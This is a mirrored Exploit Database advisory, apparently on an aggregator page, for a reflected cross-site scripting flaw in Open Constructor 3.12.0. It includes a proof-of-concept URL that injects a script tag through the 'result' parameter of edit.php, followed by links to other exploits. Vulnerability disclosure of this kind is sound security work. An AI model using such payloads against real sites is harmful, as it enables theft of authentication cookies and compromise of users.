Open Constructor – ‘/data/file/edit.php?result’ Cross-Site Scripting

Exploit Database
12 阅读

作者： Lorenzo Cantoni

日期： 2012-08-04
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37579/

source: https://www.securityfocus.com/bid/54822/info
 
Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
 
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Open Constructor 3.12.0 is vulnerable; other versions may also be affected. 

http://www.example.com/openconstructor/data/file/edit.php?result=<script>aler('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save

last Exploits
Open Constructor – ‘/data/file/edit.php?result’ Cross-Site Scripting的更多信息

Grandstream UCM6200 Series CTI Interface – ‘user_password’ SQL Injection：
PhpWiki 1.5.4 – Multiple Vulnerabilities：
vBulletin 4.0.x < 4.1.2 - 'search.php?cat' SQL Injection：
CubeCart 3.x – Arbitrary File Upload：
Joomla! Component com_aclsfgpl – ‘index.php’ Arbitrary File Upload：
WSTMart 2.0.8 – Cross-Site Scripting：
MyPHPDating 1.0 – SQL Injection：
Technology for Solutions 1.0 – ‘id’ Cross-Site Scripting：